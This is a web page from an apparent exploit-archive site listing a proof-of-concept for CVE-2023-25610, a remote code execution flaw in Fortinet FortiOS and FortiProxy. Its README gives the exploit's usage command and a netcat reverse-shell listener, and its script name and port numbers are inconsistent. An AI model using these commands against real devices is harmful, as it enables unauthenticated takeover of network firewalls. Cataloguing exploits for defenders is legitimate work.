Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-25610 PoC — Fortinet FortiOS和FortiProxy 安全漏洞

Source
https://github.com/qi4L/CVE-2023-25610
Associated Vulnerability
Title:Fortinet FortiOS和FortiProxy 安全漏洞 (CVE-2023-25610)
Description:A buffer underwrite ('buffer underflow') vulnerability in the administrative interface of Fortinet FortiOS version 7.2.0 through 7.2.3, version 7.0.0 through 7.0.6, version 6.4.0 through 6.4.11 and version 6.2.12 and below, FortiProxy version 7.2.0 through 7.2.2, version 7.0.0 through 7.0.8, version 2.0.12 and below and FortiOS-6K7K version 7.0.5, version 6.4.0 through 6.4.10 and version 6.2.0 through 6.2.10 and below allows a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.
Description
FortiOS 管理界面中的堆内存下溢导致远程代码执行
Readme
# CVE-2023-25610

FortiOS 管理界面中的堆内存下溢导致远程代码执行。

# 范围和限制

1. Fortinet 6.x
2. 基于 TLSv1.3,在其他 TLS 版本上可能存在差异

# 用法

python3 cve-2022-42475.py rhost rport lhost 'command'

```
python3 CVE-2023-25610.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
```

# Listener

EXP 使用 python 命令在端口 31337 上设置反弹 shell

```
nc -lvnp 31226
```
File Snapshot

 [4.0K]  /data/pocs/8ee131da812434b3707655bb795dfbceae90b43d
├── [2.0K]  CVE-2023-25610.py
└── [ 422]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →